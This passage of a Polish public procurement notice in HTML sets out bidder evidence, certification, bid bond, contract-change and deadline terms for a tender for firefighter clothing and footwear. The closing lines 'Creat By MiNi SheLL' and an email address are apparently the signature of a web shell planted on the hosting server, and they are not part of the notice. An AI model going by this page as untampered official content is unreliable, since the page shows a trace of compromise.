w okresie ostatnich 3 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z informacją o wykonaniu<br/>(Załącznik nr 4 do SWZ):<br/>• dla Części 1 - minimum jednego zamówienia polegającego na dostawie odzieży strażackiej o wartości co najmniej 130 000,00 zł<br/>brutto (każda)<br/>• dla części 2 - minimum jednego zamówienia polegającego na dostawie obuwia strażackiego o wartości co najmniej 30 000,00 zł<br/>brutto (każda)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">: 1. Zgodnie z art. 274 ust. 1<br/>ustawy PZP Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust.1 ustawy z dnia 11<br/>września 2019 r. PZP (Załącznik nr 3 do SWZ) - oddzielnie składa Wykonawca, Lider konsorcjum, Partner konsorcjum, wszyscy<br/>partnerzy spółki cywilnej, podmiot udostępniający zasoby, podwykonawca.<br/>2) Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej (Załącznik nr 5 do SWZ) - oddzielnie<br/>składa Wykonawca, Lider konsorcjum, Partner konsorcjum, wszyscy partnerzy spółki cywilnej, podmiot udostępniający zasoby,<br/>podwykonawca.<br/>3) Oświadczenie dotyczące uczestnictwa w systemie GS-1 (Załącznik nr 11 do SWZ).<br/>2. Wyżej wymienione dokumenty należy opatrzyć kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem<br/>osobistym oraz złożyć Zamawiającemu za pośrednictwem Platformy SmartPZP https://portal.smartpzp.pl, w miejscu ogłoszenia<br/>niniejszego postępowania.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) Ważne Świadectwa dopuszczenia dla:<br/>a) Część 1 – Świadectwo dopuszczenia do użytkowania wydane przez CNBOP potwierdzające spełnienie normy PN-EN<br/>469 dla ubrania specjalnego dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 1,<br/>b) Część 1 – Świadectwo dopuszczenia do użytkowania wydane przez CNBOP potwierdzające spełnienie normy PN-EN<br/>15614 dla ubrania specjalnego lekkiego dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 2<br/>c) Część 1 – Świadectwo dopuszczenia wydane przez CNBOP dla pozycji wyszczególnionych w Formularzu cenowym –<br/>pozycja 3<br/>d) Część 1 – Świadectwo dopuszczenia wydane przez CNBOP dla pozycji wyszczególnionych w Formularzu cenowym –<br/>pozycja 4<br/>e) Część 1 – Świadectwo dopuszczenia wydane przez CNBOP dla pozycji wyszczególnionych w Formularzu cenowym –<br/>pozycja 5<br/>f) Część 2 – Świadectwo dopuszczenia do użytkowania wydane przez CNBOP dla pozycji wyszczególnionych w Formularzu<br/>cenowym – pozycja 1<br/>g) Część 2 – Świadectwo dopuszczenia do użytkowania wydane przez CNBOP dla pozycji wyszczególnionych w<br/>Formularzu cenowym – pozycja 2<br/>2) Certyfikaty:<br/>a) Część 1 – Certyfikat oceny typu WE dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 1<br/>b) Część 1 – Certyfikat oceny typu WE dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 3<br/>c) Część 2 – Certyfikat oceny typu WE dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 1<br/>d) Część 2 – Certyfikat oceny typu WE dla pozycji wyszczególnionych w Formularzu cenowym – pozycja 2 <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Art. 107 ust. 2 ustawy PZP przewiduje, że uzupełnieniu mogą podlegać wyłącznie niezłożone lub złożone, ale niekompletne<br/>przedmiotowe środki dowodowe. Zamawiający, przewiduje możliwość uzupełnienia przedmiotowych środków dowodowych,<br/>ale zobowiązany jest w przedmiocie tego uzupełnienia wyłącznie do zażądania od Wykonawcy:<br/>1) Złożenia przedmiotowego środka dowodowego, który nie został złożony,<br/>2) Uzupełnienia części złożonego dokumentu brakującą (niezłożoną) częścią.<br/>Art. 107 PZP nie upoważnia natomiast Zamawiającego do wezwania o poprawienie złożonego dokumentu, jeżeli budzi on<br/>Ogłoszenie nr 2024/BZP 00279455/01 z dnia 2024-04-10<br/>2024-04-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>jego wątpliwości lub nie potwierdza,<br/>że dostawy, usługi lub roboty budowlane oferowane przez wykonawcę spełniają wymogi Zamawiającego.<br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty (Załącznik nr 1 do SWZ).<br/>2. Do oferty Wykonawca musi dołączyć oświadczenie w zakresie wskazanym<br/>w Załączniku nr 2 do SWZ (tymczasowo zastępujące wymagane podmiotowe środki dowodowe). Informacje zawarte w<br/>oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu oraz nie<br/>podlega wykluczeniu na dzień składania ofert. Oświadczenie składane jest pod rygorem nieważności<br/>w formie elektronicznej (tj. postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Oświadczenie o którym mowa w art. 125 ust. 1 ustawy PZP składają odrębnie:<br/>- Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku<br/>oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>- podmiot udostępniający zasoby na zasadach art. 118 ustawy PZP. W takim przypadku oświadczenie potwierdza brak<br/>podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca<br/>powołuje się na jego zasoby;<br/>- podwykonawcy, na których zasobach Wykonawca nie polega przy wykazywaniu spełniania warunków udziału w<br/>postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podwykonawcy.<br/>3. Oświadczenie w zakresie wypełniania obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO (Załącznik<br/>nr 12 do SWZ). - oddzielnie składa Wykonawca, Lider konsorcjum, Partner/rzy konsorcjum, wspólnicy spółki cywilnej(dot.<br/>wszystkich partnerów spółki), podmiot udostępniający zasoby, podwykonawca.<br/>4. Formularz/e cenowy/e sporządzone wg wzoru Zamawiającego (Część 1 - Załącznik nr 8a do SWZ, Część 2 - Załącznik nr<br/>8b do SWZ).<br/>5. Zobowiązanie podmiotu udostępniającego zasoby lub inny dokument, w przypadku powołania się przez Wykonawcę na<br/>zasoby innych podmiotów udostępniających zasoby (Załącznik nr 6 do SWZ);<br/>6. Pełnomocnictwo - jeśli dotyczy<br/>7. Samooczyszczenie - jeśli dotyczy<br/>8. Zastrzeżenie tajemnicy przedsiębiorstwa - jeśli dotyczy<br/>9. Dowód wniesienia wadium.<br/>W przypadku dokonania przelewu bankowego zaleca się załączenie do oferty dokumentu potwierdzającego wniesienie<br/>wadium w pieniądzu.<br/>W przypadku wnoszenia wadium w formie gwarancji – oryginał dokumentu gwarancyjnego w postaci elektronicznej,<br/>opatrzony podpisem przez jego wystawcę (ubezpieczyciela) należy złożyć wraz z ofertą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert w wysokości:<br/>a) Dla Części 1 – 6 600,00 zł<br/>b) Dla Części 2 – 1 300,00 zł<br/>2. Wniesione wadium musi zabezpieczać cały okres związania ofert <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>2. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia lub reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia<br/>publicznego. Zaleca się aby pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Pełnomocnictwo może być udzielone w szczególności:<br/>a) łącznie przez wszystkich Wykonawców (jeden dokument),<br/>b) oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców).<br/>W każdym jednak przypadku w treści dokumentu pełnomocnictwa zaleca się wymienić wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, udzielających pełnomocnictwa. Pełnomocnictwo należyty złożyć wraz z ofertą.<br/>3. Wszelka korespondencja oraz rozliczenie dokonywane będą wyłącznie<br/>z pełnomocnikiem. Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą<br/>zobowiązani są przed podpisaniem umowy zawrzeć konsorcjum w formie cywilno-prawnego porozumienia. Przed<br/>zawarciem umowy Zamawiający może żądać kopii umowy regulującej współpracę tych Wykonawców.<br/>4. W odniesieniu do wymagań postawionych przez Zamawiającego każdy<br/>Ogłoszenie nr 2024/BZP 00279455/01 z dnia 2024-04-10<br/>2024-04-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>z Wykonawców występujących wspólnie (np. konsorcja – lider i partner/rzy konsorcjum, spółki cywilne – wszyscy partnerzy<br/>spółki) musi oddzielnie złożyć:<br/>a) oświadczenie w zakresie wskazanym w Załączniku nr 2 do SWZ. Informacje zawarte w oświadczeniu będą stanowić<br/>dowód potwierdzający, że każdy<br/>z Wykonawców występujących wspólnie (np. konsorcja, spółki cywilne) nie podlegają wykluczeniu oraz spełniają warunki<br/>udziału w postępowaniu w zakresie w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu na dzień składania ofert, tymczasowo zastępując wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe;<br/>b) Oświadczenie Wykonawcy w zakresie wypełniania obowiązków informacyjnych przewidzianych w art. 13 lub art. 14<br/>RODO (Załącznik nr 12 do SWZ);<br/>c) Oświadczenie Wykonawcy o braku przynależności lub przynależności do tej samej grupy kapitałowej (Załącznik nr 5 do<br/>SWZ);<br/>d) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust.1 ustawy z dnia 11 września 2019 r. PZP (Załącznik nr 3 do SWZ).<br/>5. Dokumenty, o których mowa w pkt 4 lit. c)-d) Zamawiający będzie żądał od Wykonawcy, którego oferta będzie najwyżej<br/>oceniona. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający, zgodnie z art. 455 ust. 1 ustawy PZP przewiduje możliwość dokonania zmian postanowień zawartej umowy<br/>w sprawie zamówienia publicznego w sposób i na warunkach określonych w projekcie umowy oraz SWZ.<br/>2. Zamawiający dopuszcza możliwość dokonania zmian (zgodnie z art. 455 ust. 1 ustawy PZP) postanowień zawartej<br/>umowy w następujących przypadkach:<br/>1) zmiany danych dotyczących stron umowy, jak zmiana nazwy (jeśli nie oznacza przekształcenia podmiotowego lub<br/>przedmiotowego) siedziby, adresu, numeru konta bankowego np. w przypadku zmian wpisów w ewidencji działalności<br/>gospodarczej lub KRS;<br/>2) osób upoważnionych, jako przedstawiciele stron itp., w przypadku nieprzewidzianych zdarzeń losowych takich jak m.in.<br/>choroba, śmierć, ustanie stosunku pracy; zmiana pełnomocnictwa od nadzorowania i koordynowania;<br/>3) zmiany terminu realizacji zamówienia w przypadku:<br/>a) wstrzymania dostaw przez Zamawiającego z przyczyn leżących po stronie Zamawiającego termin wykonania umowy<br/>może ulec przesunięciu o okres nie dłuższy niż okres 30 dni,<br/>b) wystąpienia siły wyższej (zdarzenia, których Strony nie mogły przewidzieć, którym nie mogły zapobiec ani którym nie<br/>mogły przeciwdziałać, a które uniemożliwiają Wykonawcy realizację w całości lub części jego zobowiązań wynikających z<br/>umowy) lub innych okoliczności niezależnych od Stron lub których Strony przy zachowaniu należytej staranności nie były w<br/>stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonaniu przedmiotu umowy spowodowane<br/>przez osobę trzecią – o czas działania siły wyższej oraz czas potrzebny do usunięcia skutków jej działania oraz usunięcia<br/>przeszkód;<br/>4) zmiany wysokości wynagrodzenia dotyczącego zmówienia objętego prawem opcji określonego w § 2 ust. 1 b) wzoru<br/>umowy w przypadku zmiany cen materiałów lub kosztów związanych z realizacją przedmiotu umowy, w przypadku<br/>skorzystania przez Zamawiającego z prawa opcji (waloryzacja);<br/>5) zmiany inne w przypadku zmian w prawie, ustawach i rozporządzeniach, które nastąpiły po dniu otwarcia ofert oraz na<br/>skutek innych przyczyn związanych z realizacją przedmiotu zamówienia, a niezależnych od stron.<br/>6) zmiany miejsca dostawy dla całości lub części zamówienia w obrębie województwa mazowieckiego.<br/>3. Zmiany w wyżej opisanym zakresie mogą być dokonane w zawartych umowach wyłącznie w formie pisemnej, w postaci<br/>aneksu do umowy, pod rygorem nieważności wprowadzonych zmian <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/szi</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-21 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-19</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Minimalny termin realizacji przedmiotu zamówienia: 30 dni od daty podpisania umowy.<br/>Maksymalny termin realizacji przedmiotu zamówienia: 50 dni od daty podpisania umowy.<br/>Maksymalna liczba dni jaką Wykonawca może podać w Formularzu oferty to 20 (dotyczy Części 1 i Części 2).<br/>Jeżeli w Formularzu oferty nie zostanie podana żadna liczba dni, o które Wykonawca skróci termin wykonania przedmiotu<br/>zamówienia, lub zostanie podana błędna liczna dni, Zamawiający uzna, że Wykonawca zrealizuje dostawy w terminie<br/>najdłuższym, czyli 50 dni od daty podpisania umowy.<br/>Na przykład, jeżeli w Formularzu oferty zostanie podana liczba 10 (liczba dni, o które Wykonawca skróci termin wykonania<br/>przedmiotu zamówienia), Zamawiający uzna, że Wykonawca zrealizuje dostawy w terminie 40 dni od daty podpisania<br/>umowy.<br/>Inne szczegółowe dane dotyczące niniejszego postępowania są dostępne na stronie internetowej Zamawiającego tj -<br/>https://portal.smartpzp.pl/sz ,w miejscu ogłoszenia postępowania tj. Sprawa 48/2024.

Creat By MiNi SheLL
Email: jattceo@gmail.com